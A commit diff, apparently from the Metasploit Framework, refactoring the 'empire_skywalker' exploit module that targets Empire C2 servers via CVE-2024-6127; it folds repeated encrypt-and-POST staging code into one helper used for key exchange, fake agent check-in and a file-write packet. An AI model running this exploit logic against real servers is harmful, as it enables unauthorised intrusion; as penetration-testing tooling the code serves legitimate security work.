Avoid code duplication

Takahiro-Yoko · Takahiro-Yoko · commit 10b723751b61 · 2024-07-26T13:11:26.000+09:00
diff --git a/modules/exploits/linux/http/empire_skywalker.rb b/modules/exploits/linux/http/empire_skywalker.rb
@@ -248,15 +248,8 @@ def exploit
       # stage1
       private_key = SecureRandom.hex(KEYLENGTH).hex
       public_key = GENERATOR.pow(private_key, PRIME).to_s.encode("UTF-8")
-      enc_data = aes_encrypt_then_hmac(staging_key, public_key)
       session_id = SecureRandom.alphanumeric(8).upcase
-      data = build_routing_packet(staging_key, STAGE1, enc_data, session_id)
-      res = send_request_cgi({
-        'data'      => data,
-        'method'    => 'POST',
-        'uri'       => normalize_uri(target_uri.path, datastore['STAGE_PATH']),
-        'headers' => {'user-agent' => datastore['AGENT']}
-      })
+      res = send_data_to_stage(staging_key, public_key, staging_key, STAGE1, session_id)
       fail_with(Failure::Unknown, 'Failed to send the key to STAGE1') unless res and res.code == 200
       vprint_good("Successfully sent the key to STAGE1")
 
@@ -278,14 +271,7 @@ def exploit
 
       # stage2
       sysinfo = "#{nonce+1}|#{datastore['RHOSTS']}:#{datastore['RPORT']}||:^)|:^}|127.0.1.1|:^)|False|rekt.py|2603444|python|3.11|x86_64".encode("UTF-8")
-      hmac_data = aes_encrypt_then_hmac(session_key, sysinfo)
-      rpacket = build_routing_packet(staging_key, STAGE2, hmac_data, session_id)
-      res = send_request_cgi({
-        'data'      => rpacket,
-        'method'    => 'POST',
-        'uri'       => normalize_uri(target_uri.path, datastore['STAGE_PATH']),
-        'headers' => {'user-agent' => datastore['AGENT']}
-      })
+      res = send_data_to_stage(session_key, sysinfo, staging_key, STAGE2, session_id)
       fail_with(Failure::Unknown, "Failed to communicate with STAGE2") unless res and res.code == 200
       aes_decrypt(session_key, res.body)
 
@@ -424,9 +410,12 @@ def write_file_cve_2024_6127(path, data, session_id, session_key, staging_key)
         compress(data)
       ].join('|')
     )
-    enc_packet = aes_encrypt_then_hmac(session_key, packet)
-    data = build_routing_packet(staging_key, RESULT_POST, enc_packet, session_id)
+    send_data_to_stage(session_key, packet, staging_key, RESULT_POST, session_id)
+  end
 
+  def send_data_to_stage(session_key, packet, staging_key, task_id, session_id)
+    enc_packet = aes_encrypt_then_hmac(session_key, packet)
+    data = build_routing_packet(staging_key, task_id, enc_packet, session_id)
     res = send_request_cgi({
       'data'      => data,
       'method'    => 'POST',
